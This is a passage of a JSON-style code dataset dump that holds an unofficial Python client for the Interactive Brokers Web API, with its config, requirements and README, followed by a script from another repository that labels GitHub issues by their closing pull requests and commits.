The end-point will return by \n default bid, ask, last, change, change pct, close, listing exchange. \n See response fields for a list of available fields that can be request \n via fields argument. The endpoint /iserver/accounts should be called \n prior to /iserver/marketdata/snapshot. To receive all available fields \n the /snapshot endpoint will need to be called several times.\n\n NAME: conid\n DESC: The list of contract IDs you wish to pull current quotes for.\n TYPE: List<String>\n\n NAME: since\n DESC: Time period since which updates are required. \n Uses epoch time with milliseconds.\n TYPE: String\n\n NAME: fields\n DESC: List of fields you wish to retrieve for each quote.\n TYPE: List<String> \n\n '''\n\n # define request components\n endpoint = 'iserver/marketdata/snapshot'\n req_type = 'GET'\n\n # join the two list arguments so they are both a single string.\n conids_joined = self._prepare_arguments_list(parameter_list = conids)\n \n if fields is not None:\n fields_joined = \",\".join(str(n) for n in fields)\n else:\n fields_joined = \"\"\n\n # define the parameters\n if since is None:\n params = {'conids':conids_joined,\n 'fields':fields_joined}\n else:\n params = {'conids':conids_joined,\n 'since':since,\n 'fields':fields_joined} \n\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = params).json()\n\n return content\n\n\n def market_data_history(self, conid = None, period = None, bar = None):\n '''\n Get history of market Data for the given conid, length of data is controlled by period and \n bar. e.g. 1y period with bar=1w returns 52 data points.\n\n NAME: conid\n DESC: The contract ID for a given instrument. If you don't know the contract ID use the\n `search_by_symbol_or_name` endpoint to retrieve it.\n TYPE: String\n\n NAME: period\n DESC: Specifies the period of look back. For example 1y means looking back 1 year from today.\n Possible values are ['1d','1w','1m','1y']\n TYPE: String\n\n NAME: bar\n DESC: Specifies granularity of data. For example, if bar = '1h' the data will be at an hourly level.\n Possible values are ['5min','1h','1w']\n TYPE: String\n\n '''\n\n # define request components\n endpoint = 'iserver/marketdata/history'\n req_type = 'GET'\n params = {'conid':conid, 'period':period, 'bar':bar}\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = params).json()\n\n return content\n\n\n '''\n SERVER ACCOUNTS ENDPOINTS\n '''\n\n\n def server_accounts(self):\n '''\n\n Returns a list of accounts the user has trading access to, their \n respective aliases and the currently selected account. Note this \n endpoint must be called before modifying an order or querying \n open orders.\n\n '''\n\n # define request components\n endpoint = 'iserver/accounts'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type)\n\n return content\n\n\n def update_server_account(self, account_id = None, check = False):\n '''\n If an user has multiple accounts, and user wants to get orders, trades, \n etc. of an account other than currently selected account, then user \n can update the currently selected account using this API and then can \n fetch required information for the newly updated account.\n\n NAME: account_id\n DESC: The account ID you wish to set for the API Session. This will be used to\n grab historical data and make orders.\n TYPE: String\n\n '''\n\n # define request components\n endpoint = 'iserver/account'\n req_type = 'POST'\n params = {'acctId':account_id}\n\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = params).json()\n\n if 'status_code' in content.keys():\n time.sleep(1)\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = params).json()\n\n return content\n\n\n def server_accountPNL(self):\n '''\n Returns an object containing PnLfor the selected account and its models \n (if any).\n '''\n\n # define request components\n endpoint = 'iserver/account/pnl/partitioned'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content \n\n '''\n CONTRACT ENDPOINTS\n '''\n\n def symbol_search(self, symbol):\n '''\n Performs a symbol search for a given symbol and returns information related to the\n symbol including the contract id.\n '''\n\n # define the request components\n endpoint = 'iserver/secdef/search'\n req_type = 'POST'\n payload = {'symbol':symbol}\n content = self._make_request(endpoint = endpoint, req_type = req_type, params= payload).json()\n\n return content\n\n\n '''\n PORTFOLIO ACCOUNTS ENDPOINTS\n '''\n\n\n def portfolio_accounts(self):\n '''\n In non-tiered account structures, returns a list of accounts for which the \n user can view position and account information. This endpoint must be called prior \n to calling other /portfolio endpoints for those accounts. For querying a list of accounts \n which the user can trade, see /iserver/accounts. For a list of subaccounts in tiered account \n structures (e.g. financial advisor or ibroker accounts) see /portfolio/subaccounts.\n\n '''\n\n # define request components\n endpoint = 'portfolio/accounts'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n def portfolio_sub_accounts(self):\n '''\n Used in tiered account structures (such as financial advisor and ibroker accounts) to return a \n list of sub-accounts for which the user can view position and account-related information. This \n endpoint must be called prior to calling other /portfolio endpoints for those subaccounts. To \n query a list of accounts the user can trade, see /iserver/accounts.\n\n '''\n\n # define request components\n endpoint = r'portfolio/subaccounts'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n \n return content\n\n\n def portfolio_account_info(self, account_id = None):\n '''\n Used in tiered account structures (such as financial advisor and ibroker accounts) to return a \n list of sub-accounts for which the user can view position and account-related information. This \n endpoint must be called prior to calling other /portfolio endpoints for those subaccounts. To \n query a list of accounts the user can trade, see /iserver/accounts.\n\n NAME: account_id\n DESC: The account ID you wish to return info for.\n TYPE: String\n\n '''\n\n # define request components\n endpoint = r'portfolio/{}/meta'.format(account_id)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n \n return content\n\n\n def portfolio_account_summary(self, account_id = None):\n '''\n Returns information about margin, cash balances and other information \n related to specified account. See also /portfolio/{accountId}/ledger. \n /portfolio/accounts or /portfolio/subaccounts must be called \n prior to this endpoint.\n\n NAME: account_id\n DESC: The account ID you wish to return info for.\n TYPE: String\n\n '''\n\n # define request components\n endpoint = r'portfolio/{}/summary'.format(account_id)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n \n return content\n\n\n def portfolio_account_ledger(self, account_id = None):\n '''\n Information regarding settled cash, cash balances, etc. in the account's \n base currency and any other cash balances hold in other currencies. /portfolio/accounts \n or /portfolio/subaccounts must be called prior to this endpoint. The list of supported \n currencies is available at https://www.interactivebrokers.com/en/index.php?f=3185.\n\n NAME: account_id\n DESC: The account ID you wish to return info for.\n TYPE: String\n\n '''\n\n # define request components\n endpoint = r'portfolio/{}/ledger'.format(account_id)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n \n return content\n\n\n def portfolio_account_allocation(self, account_id = None):\n '''\n Information about the account's portfolio allocation by Asset Class, Industry and \n Category. /portfolio/accounts or /portfolio/subaccounts must be called prior to \n this endpoint.\n\n NAME: account_id\n DESC: The account ID you wish to return info for.\n TYPE: String\n\n '''\n\n # define request components\n endpoint = r'portfolio/{}/allocation'.format(account_id)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n \n return content\n\n\n def portfolio_accounts_allocation(self, account_ids = None):\n '''\n Similar to /portfolio/{accountId}/allocation but returns a consolidated view of of all the \n accounts returned by /portfolio/accounts. /portfolio/accounts or /portfolio/subaccounts must \n be called prior to this endpoint.\n\n NAME: account_ids\n DESC: A list of Account IDs you wish to return alloacation info for.\n TYPE: List<String>\n\n '''\n\n # define request components\n endpoint = r'portfolio/allocation'\n req_type = 'POST'\n payload = account_ids\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = payload).json()\n \n return content\n\n\n def portfolio_account_positions(self, account_id = None, page_id = None):\n '''\n Returns a list of positions for the given account. The endpoint supports paging, \n page's default size is 30 positions. /portfolio/accounts or /portfolio/subaccounts \n must be called prior to this endpoint.\n\n NAME: account_id\n DESC: The account ID you wish to return positions for.\n TYPE: String\n\n NAME: page_id\n DESC: The page you wish to return if there are more than 1. The\n default value is '0'.\n TYPE: String\n\n\n ADDITIONAL ARGUMENTS NEED TO BE ADDED!!!!!\n '''\n\n # make sure we have a page ID.\n if page_id is None:\n page_id = 0\n else:\n page_id = page_id\n\n # define request components\n endpoint = r'portfolio/{}/positions/{}'.format(account_id, page_id)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n \n return content\n\n #\n # RENAME THIS\n #\n\n def portfolio_account_position(self, account_id = None, conid = None):\n '''\n Returns a list of all positions matching the conid. For portfolio models the conid \n could be in more than one model, returning an array with the name of the model it \n belongs to. /portfolio/accounts or /portfolio/subaccounts must be called prior to \n this endpoint.\n\n NAME: account_id\n DESC: The account ID you wish to return positions for.\n TYPE: String\n\n NAME: conid\n DESC: The contract ID you wish to find matching positions for.\n TYPE: String\n\n '''\n\n # define request components\n endpoint = r'portfolio/{}/position/{}'.format(account_id, conid)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n #\n # GET MORE DETAILS ON THIS\n #\n\n def portfolio_positions_invalidate(self, account_id = None):\n '''\n Invalidates the backend cache of the Portfolio. ???\n\n NAME: account_id\n DESC: The account ID you wish to return positions for.\n TYPE: String\n\n '''\n \n # define request components\n endpoint = r'portfolio/{}/positions/invalidate'.format(account_id)\n req_type = 'POST'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n def portfolio_positions(self, conid = None):\n '''\n Returns an object of all positions matching the conid for all the selected accounts. \n For portfolio models the conid could be in more than one model, returning an array \n with the name of the model it belongs to. /portfolio/accounts or /portfolio/subaccounts \n must be called prior to this endpoint.\n\n NAME: conid\n DESC: The contract ID you wish to find matching positions for.\n TYPE: String \n '''\n\n # define request components\n endpoint = r'portfolio/positions/{}'.format(conid)\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n '''\n TRADES ENDPOINTS\n '''\n\n\n def trades(self):\n '''\n Returns a list of trades for the currently selected account for current day and \n six previous days.\n '''\n\n # define request components\n endpoint = r'iserver/account/trades'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n '''\n ORDERS ENDPOINTS\n '''\n\n\n def get_live_orders(self):\n '''\n The end-point is meant to be used in polling mode, e.g. requesting every \n x seconds. The response will contain two objects, one is notification, the \n other is orders. Orders is the list of orders (cancelled, filled, submitted) \n with activity in the current day. Notifications contains information about \n execute orders as they happen, see status field.\n\n '''\n\n # define request components\n endpoint = r'iserver/account/orders'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n def place_order(self, account_id = None, order = None):\n '''\n Please note here, sometimes this end-point alone can't make sure you submit the order \n successfully, you could receive some questions in the response, you have to to answer \n them in order to submit the order successfully. You can use \"/iserver/reply/{replyid}\" \n end-point to answer questions.\n\n NAME: account_id\n DESC: The account ID you wish to place an order for.\n TYPE: String\n\n NAME: order\n DESC: Either an IBOrder object or a dictionary with the specified payload.\n TYPE: IBOrder or Dict\n\n '''\n\n if type(order) is dict:\n order = order\n else:\n order = order.create_order()\n\n # define request components\n endpoint = r'iserver/account/{}/order'.format(account_id)\n req_type = 'POST'\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = order).json()\n\n return content\n\n\n def place_orders(self, account_id = None, orders = None):\n '''\n An extension of the `place_order` endpoint but allows for a list of orders. Those orders may be\n either a list of dictionary objects or a list of IBOrder objects.\n\n NAME: account_id\n DESC: The account ID you wish to place an order for.\n TYPE: String\n\n NAME: orders\n DESC: Either a list of IBOrder objects or a list of dictionaries with the specified payload.\n TYPE: List<IBOrder Object> or List<Dictionary>\n\n '''\n\n # EXTENDED THIS\n if type(orders) is list:\n orders = orders\n else:\n orders = orders\n\n # define request components\n endpoint = r'iserver/account/{}/orders'.format(account_id)\n req_type = 'POST'\n\n try:\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = orders).json()\n except:\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = orders)\n\n return content\n\n def place_order_scenario(self, account_id = None, order = None):\n '''\n This end-point allows you to preview order without actually submitting the \n order and you can get commission information in the response.\n\n NAME: account_id\n DESC: The account ID you wish to place an order for.\n TYPE: String\n\n NAME: order\n DESC: Either an IBOrder object or a dictionary with the specified payload.\n TYPE: IBOrder or Dict\n\n '''\n\n if type(order) is dict:\n order = order\n else:\n order = order.create_order()\n\n # define request components\n endpoint = r'iserver/account/{}/order/whatif'.format(account_id)\n req_type = 'POST'\n\n try:\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = order).json()\n except:\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = order)\n\n return content\n\n\n def modify_order(self, account_id = None, customer_order_id = None, order = None):\n '''\n Modifies an open order. The /iserver/accounts endpoint must first\n be called.\n\n NAME: account_id\n DESC: The account ID you wish to place an order for.\n TYPE: String\n\n NAME: customer_order_id\n DESC: The customer order ID for the order you wish to MODIFY.\n TYPE: String\n\n NAME: order\n DESC: Either an IBOrder object or a dictionary with the specified payload.\n TYPE: IBOrder or Dict\n\n '''\n\n\n if type(order) is dict:\n order = order\n else:\n order = order.create_order()\n\n # define request components\n endpoint = r'iserver/account/{}/order/{}'.format(account_id, customer_order_id)\n req_type = 'POST'\n content = self._make_request(endpoint = endpoint, req_type = req_type, params = order).json()\n\n return content \n\n\n def delete_order(self, account_id = None, customer_order_id = None):\n '''\n Deletes the order specified by the customer order ID.\n\n NAME: account_id\n DESC: The account ID you wish to place an order for.\n TYPE: String\n\n NAME: customer_order_id\n DESC: The customer order ID for the order you wish to DELETE.\n TYPE: String\n\n '''\n # define request components\n endpoint = r'iserver/account/{}/order/{}'.format(account_id, customer_order_id)\n req_type = 'DELETE'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content "
},
{
"alpha_fraction": 0.6612903475761414,
"alphanum_fraction": 0.6612903475761414,
"avg_line_length": 16.85714340209961,
"blob_id": "1acdd95ca818993495b620d595add13efca45132",
"content_id": "f107601717ee73cf190cb8ba091a3378066bc299",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 7,
"path": "/ibw/config.py",
"repo_name": "carina28/interactive-broker-python-api",
"src_encoding": "UTF-8",
"text": "REGULAR_USERNAME = ''\nREGULAR_PASSWORD = ''\nREGULAR_ACCOUNT = ''\n\nPAPER_USERNAME = ''\nPAPER_PASSWORD = ''\nPAPER_ACCOUNT = ''"
},
{
"alpha_fraction": 0.3962264060974121,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 16.66666603088379,
"blob_id": "6073892fca65f0912b794088eec9c27b28fa3b9e",
"content_id": "32ab6fc627f3c9ddda2a3ee80edd9b6d0be7f128",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "carina28/interactive-broker-python-api",
"src_encoding": "UTF-8",
"text": "certifi==2019.11.28\nrequests==2.22.0\nurllib3==1.25.3\n"
},
{
"alpha_fraction": 0.7724450826644897,
"alphanum_fraction": 0.7769818305969238,
"avg_line_length": 41.73469543457031,
"blob_id": "eaa1fd9214311a5941b1d91d757733b0e649bc57",
"content_id": "03f004be79642969c784b46e8438668183f4d462",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4188,
"license_type": "permissive",
"max_line_length": 342,
"num_lines": 98,
"path": "/README.md",
"repo_name": "carina28/interactive-broker-python-api",
"src_encoding": "UTF-8",
"text": "#### Table of Contents\n\n- [Overview](#overview)\n- [What's in the API](#whats-in-the-api)\n- [Requirements](#requirements)\n- [API Key & Credentials](#api-key-and-credentials)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Features](#features)\n- [Documentation & Resources](#documentation-and-resources)\n- [Support These Projects](#support-these-projects)\n\n## Overview\n\nThe unofficial Python API client library for Interactive Broker Client Portal Web API allows individuals with Interactive Broker accounts to manage trades, pull historical and real-time data, manage their accounts, create and modify orders all using the Python programming language.\n\nInteractive Broker offers multiple APIs for their clients. If you would like to learn more about their API offerings click on the links below:\n\n- TradeStation API, please refer to the [official documentation](http://interactivebrokers.github.io/tws-api/)\n- Client Portal API, please refer to the [official documentation](https://interactivebrokers.github.io/cpwebapi/)\n- Third Party API, plesfe refer to the [official documentation](https://www.interactivebrokers.com/webtradingapi/)\n\n## What's in the API\n\n- Authentication\n- Account Endpoints\n- Market Data Endpoints\n- Trade Endpoints\n- Portfolio Endpoints\n- Scanner Endpoints\n- Portfolio Analysis Endpoints\n- Web Streaming\n\n## Requirements\n\nThe following requirements must be met to use this API:\n\n- A Interactive Broker account, you'll need your account password and account number to use the API.\n- Java 8 update 192 or higher installed (gateway is compatible with higher Java versions including OpenJDK 11).\n- Download the [Client Portal Gateway](https://www.interactivebrokers.com/en/index.php?f=45185)\n\n## API Key and Credentials\n\nThe API does not require any API keys to use it, all of the authentication is handled by the Client Portal Gateway. Everytime a user starts a new session with the API they will need to proivde their login credentials for the account they wish to use. The Interactive Broker Web API does offer the ability to use the API using a paper account.\n\nAdditionally, to authenticate yourself using this library, you will need to provide your account number and password for your main TD Ameritrade account.\n\n**Important:** Your account number and account password should be kept secret.\n\n## Installation\n\nPLACE HOLDER FOR PIP INSTALLATION\n\n## Usage\n\nThis example demonstrates how to login to the API and demonstrates sending a request using the `market_data_history` endpoint, using your API key.\n\n```python\nfrom ibw.client import IBClient\nfrom ibw.config import REGULAR_ACCOUNT, REGULAR_PASSWORD, REGULAR_USERNAME, PAPER_ACCOUNT, PAPER_PASSWORD, PAPER_USERNAME\n\n# Create a new session of the IB Web API.\nib_session = IBClient(username = REGULAR_USERNAME, password = REGULAR_PASSWORD)\n\n# Connect to the session.\nib_session.connect()\n\n# Validate the current session\nib_session.validate()\n\n# Grab historical prices.\naapl_prices = ib_session.market_data_history(conid = ['265598'], period = '1d', bar = '5min')\n```\n\n## Features\n\n### Request Validation\n\nFor certain requests, in a limited fashion, it will help validate your request when possible. For example, when grabbing real-time quotes using the `market_data` endpoint, it will validate the fields you request to ensure they're valid fields for that endpoint.\n\n## Documentation and Resources\n\n### Official API Documentation\n\n- [Getting Started](https://interactivebrokers.github.io/cpwebapi/index.html#login)\n- [Endpoints](https://interactivebrokers.com/api/doc.html)\n- [Websockets](https://interactivebrokers.github.io/cpwebapi/RealtimeSubscription.html)\n\n## Support these Projects\n\n**Patreon:**\nHelp support this project and future projects by donating to my [Patreon Page](https://www.patreon.com/sigmacoding). I'm always looking to add more content for individuals like yourself, unfortuantely some of the APIs I would require me to pay monthly fees.\n\n**YouTube:**\nIf you'd like to watch more of my content, feel free to visit my YouTube channel [Sigma Coding](https://www.youtube.com/c/SigmaCoding).\n\n**Hire Me:**\nIf you have a project, you think I can help you with feel free to reach out at [email protected]\n"
}
] | 5 |
lstrait2/github-data-collection | https://github.com/lstrait2/github-data-collection | de4d666a27d0081d28c8f1622bf84ef5ed51dc0d | 0d24bf543d66563c967efbe4ecd28369a90f71f4 | 3fa6cb5e967da10a722e929c886eaceb5c93716d | refs/heads/master | 2021-07-14T03:22:40.678712 | 2018-09-12T23:06:57 | 2018-09-12T23:06:57 | 134,154,474 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7886179089546204,
"alphanum_fraction": 0.7967479825019836,
"avg_line_length": 29.75,
"blob_id": "d9975c2617e6367942a6e0e51cf74f98692e1cf7",
"content_id": "d96474bff9e357d8d38ec850be6b7f90c59396f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 4,
"path": "/README.md",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "# github-data-collection\nTool to collect and analyze issue and commit data for a given Repository.\n\nNOTE: Must use Python3\n"
},
{
"alpha_fraction": 0.6582425832748413,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 36.10095977783203,
"blob_id": "d4f59c18ac9f0bec9469dfaf0a598c25b788388c",
"content_id": "b988420130e0f85c1199039519ac97139939e58e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7716,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 208,
"path": "/src/label_tasks.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
"text": "import json\nimport os\nimport re\nimport requests\n\ndef label_issues_no_assignee(issues, all_prs):\n\t\"\"\" Label issues by who actually completed them \"\"\"\n\tfor issue in issues[8000:9000]:\n\t\tprint(issue['url'])\n\t\tissue['training_labels'] = {}\n\t\tprs = find_closing_pr(issue['number'], all_prs)\n\t\tprint(len(prs))\n\t\tprs += find_closing_prs_comments(issue['number'], all_prs)\n\t\tprint(len(prs))\n\t\tissue['matching_prs'] = prs\n\t\tcommits = find_closing_commit(issue)\n\t\tprint(len(commits))\n\t\tissue['matching_commits'] = commits\n\t\tcompleted_by = set()\n\t\tfor commit in commits:\n\t\t\tif commit and 'author' in commit:\n\t\t\t\tcompleted_by.add(commit['author']['login'])\n\t\tfor pr in prs:\n\t\t\tif pr:\n\t\t\t\tcompleted_by.add(pr['user']['login'])\n\t\tprint(completed_by)\n\t\tissue['completed_by'] = list(completed_by)\n\t# write out to labeled file\n\twith open('data/flutter/flutter_issues_labeled_9.json', 'w') as f:\n\t\tjson.dump(issues[8000:9000], f, indent=4)\n\n\ndef label_issues(issues, all_prs):\n\tfor issue in issues[:1500]:\n\t\tissue['training_labels'] = {}\n\t\tassignees = get_assignees(issue)\n\t\tif assignees == []:\n\t\t\tcontinue\n\t\tprs = find_closing_pr(issue['number'], all_prs)\n\t\tprint(len(prs))\n\t\tprs += find_closing_prs_comments(issue['number'], all_prs)\n\t\tprint(len(prs))\n\t\tissue['matching_prs'] = prs\n\t\tcommits = find_closing_commit(issue)\n\t\tprint(len(commits))\n\t\tissue['matching_commits'] = commits\n\t\tassignees = get_assignees(issue)\n\t\tfor assignee in assignees:\n\t\t\tprint(assignee)\n\t\t\tlabel = 0\n\t\t\tfor commit in commits:\n\t\t\t\tif 'author' in commit:\n\t\t\t\t\tprint(\"c: \" + commit['author']['login'])\n\t\t\t\tif commit and 'author' in commit and assignee == commit['author']['login']:\n\t\t\t\t\tlabel = 1\n\t\t\tfor pr in prs:\n\t\t\t\tprint(\"p: \" + pr[\"user\"][\"login\"])\n\t\t\t\tif pr and assignee == pr['user']['login']:\n\t\t\t\t\tlabel = 1\n\t\t\tprint(issue['url'])\n\t\t\tissue['training_labels'][assignee] = label\n\t\t\tprint(issue['training_labels'])\n\t#TODO: write out to labeled file\n\twith open('data/flutter/flutter_issues_labeled_8.json', 'w') as f:\n\t\tjson.dump(issues[7000:8000], f, indent=4)\n\ndef label_issues_comments(issues, prs_comments):\n\tfor issue in issues:\n\t\tprs = find_closing_prs_comments(issue['number'], prs_comments)\n\t\tif prs != []:\n\t\t\tif 'matching_prs' in issue:\n\t\t\t\tprint(len(issue['matching_prs']))\n\t\t\t\tissue['matching_prs'] += prs\n\t\t\t\tprint(len(issue['matching_prs']))\n\t\t\telse:\n\t\t\t\tissue['matching_ptrs'] = prs\n\t\tassignees = issue['training_labels'].keys()\n\t\tfor assignee in assignees:\n\t\t\t#print(assignee)\n\t\t\tlabel = 0\n\t\t\tfor pr in prs:\n\t\t\t\tprint(\"p: \" + pr[\"user\"][\"login\"])\n\t\t\t\tif pr and assignee == pr['user']['login']:\n\t\t\t\t\tlabel = 1\n\t\t\t\tprint(issue['url'])\n\t\t\t\tprint(issue['training_labels'])\n\t\t\t\tissue['training_labels'][assignee] = max(issue['training_labels'][assignee], label)\n\t\t\t\tprint(issue['training_labels'])\n\twith open('data/flutter/flutter_issues_labeled_2.json', 'w') as f:\n\t\tjson.dump(issues, f, indent=4)\n\n\ndef find_closing_prs_comments(issue_id, prs):\n\tret = [] \n\tissue_id_string = \"#\" + str(issue_id)\n\tissue_id_string2 = \"issues/\" + str(issue_id) \n\tfor pr in prs:\n\t\tfor comment in pr['comments']:\n\t\t\tif comment['body'] and (re.search(issue_id_string + r'(?!\\d)', comment['body']) or re.search(issue_id_string2 + r'(?!\\d)', comment['body'])):\n\t\t\t\tif 'pull_request' not in pr:\n\t\t\t\t\tpr_details = pr\n\t\t\t\telse:\n\t\t\t\t\tpr_details = requests.get(pr['pull_request']['url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\t\t\t\t# only want to consider PRs that were merged into master\n\t\t\t\tif pr_details['merged'] and pr_details not in ret:\n\t\t\t\t\tret.append(pr_details)\n\treturn ret\n\n\ndef find_closing_pr(issue_id, prs):\n\t\"\"\" Find the PR(s) that reference the given issue. That is it cotains \"#{issue_id}\" in its title or body \"\"\"\n\tret = []\n\tissue_id_string = \"#\" + str(issue_id) \n\tissue_id_string2 = \"issues/\" + str(issue_id)\n\tfor pr in prs:\n\t\t# for regex, don't want #123 to match issues with same prefix (#1234)\n\t\tif re.search(issue_id_string + r'(?!\\d)', pr['title']) or (pr['body'] and re.search(issue_id_string + r'(?!\\d)', pr['body'])) or (pr['body'] and re.search(issue_id_string2 + r'(?!\\d)', pr['body'])):\n\t\t\tif 'pull_request' not in pr:\n\t\t\t\tpr_details = pr\n\t\t\telse:\n\t\t\t\tpr_details = requests.get(pr['pull_request']['url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\t\t\t# only want to consider PRs that were merged into master\n\t\t\tif pr_details['merged']:\n\t\t\t\tret.append(pr_details)\n\treturn ret\n\ndef find_failed_pr(issue_id, prs):\n\t\"\"\" Find the PR(s) that reference the given issue. That is it cotains \"#{issue_id}\" in its title or body \"\"\"\n\tret = []\n\tissue_id_string = \"#\" + str(issue_id) \n\tissue_id_string2 = \"issues/\" + str(issue_id)\n\tfor pr in prs:\n\t\t# for regex, don't want #123 to match issues with same prefix (#1234)\n\t\tif re.search(issue_id_string + r'(?!\\d)', pr['title']) or (pr['body'] and re.search(issue_id_string + r'(?!\\d)', pr['body'])) or (pr['body'] and re.search(issue_id_string2 + r'(?!\\d)', pr['body'])):\n\t\t\tif 'pull_request' not in pr:\n\t\t\t\tpr_details = pr\n\t\t\telse:\n\t\t\t\tpr_details = requests.get(pr['pull_request']['url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\t\t\t# only want to consider PRs that were merged into master\n\t\t\tif pr_details['merged']:\n\t\t\t\tret.append(pr_details)\n\treturn ret\n\n\ndef find_closing_commit(issue):\n\t\"\"\" Find the commit that closes the given issue. That is a commit (for master branch) event exists for the issue \"\"\"\n\tret = []\t\n\t#TODO: move this enrichment of issue data somewhere else...\n\tevents= requests.get(issue['events_url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\tfor event in events:\n\t\t# make sure this event is a commit and that it is for the master branch of this project\n\t\tif event['commit_id'] and get_repo_commit(event['commit_url']) == get_repo_event(event['url']):\n\t\t\tcommit_details = requests.get(event['commit_url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\t\t\tret.append(commit_details)\n\treturn ret\n\n\ndef get_repo_commit(commit_url):\n\t\"\"\" Helper method to strip out repo name from a commit event url \"\"\"\n\tcommit_repo = commit_url.replace(\"https://api.github.com/repos/\", \"\")\n\treturn commit_repo[:commit_repo.index(\"/commits\")]\n\n\ndef get_repo_event(event_url):\n\t\"\"\" Helper method to strip out repo name from a commit event url \"\"\"\n\tevent_repo = event_url.replace(\"https://api.github.com/repos/\", \"\")\n\treturn event_repo[:event_repo.index(\"/issues\")]\n\n\ndef get_assignees(issue):\n\t\"\"\" Return a list of all individuals who had been assigned to a task, in the order they were assigned \"\"\"\n\tassignees = []\n\t#TODO: move this enrichment of issue data somewhere else...\n\tevents= requests.get(issue['events_url'], auth=(os.environ['GITHUB_USERNAME'], os.environ['GITHUB_PASSWORD'])).json()\n\tfor event in events:\n\t\tif event['event'] == \"assigned\":\n\t\t\tassignees.append(event['assignee']['login'])\n\treturn assignees\n\n\n\nwith open('data/flutter/flutter_pulls_closed.json') as json_data:\n prs = json.load(json_data)\nwith open('data/flutter/flutter_issues_closed.json') as json_data:\n\tissues = json.load(json_data)\nwith open('data/tensorflow/tensorflow_issues_closed.json') as json_data_tf:\n\tissues_tf = json.load(json_data_tf)\nwith open('data/tensorflow/tensorflow_pulls_closed.json') as json_data:\n prs_tf = json.load(json_data)\n\nwith open('data/flutter/flutter_pulls_comments.json') as json_data:\n prs_comments = json.load(json_data)\n\n'''\ntemp_issue = None\nfor issue in issues:\n\tif issue['number'] == 140:\n\t\ttemp_issue = issue\n\t\tbreak\ntemp_pr = None\nfor pr in prs_comments:\n\tif pr['number'] == 830:\n\t\ttemp_pr = pr\n\t\tbreak\n'''\n\n#print(label_issues([temp_issue], [temp_pr]))\nprint(label_issues_no_assignee(issues, prs_comments))"
},
{
"alpha_fraction": 0.6597065329551697,
"alphanum_fraction": 0.6653499007225037,
"avg_line_length": 31.236364364624023,
"blob_id": "6362c856d0b4cd509bd19c906f5f771669c735dd",
"content_id": "bb9d81f58d5177ecd59760e361188a8fd83ca342",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1772,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 55,
"path": "/src/pr_enricher.py",
"repo_name": "lstrait2/github-data-collection",
"src_encoding": "UTF-8",
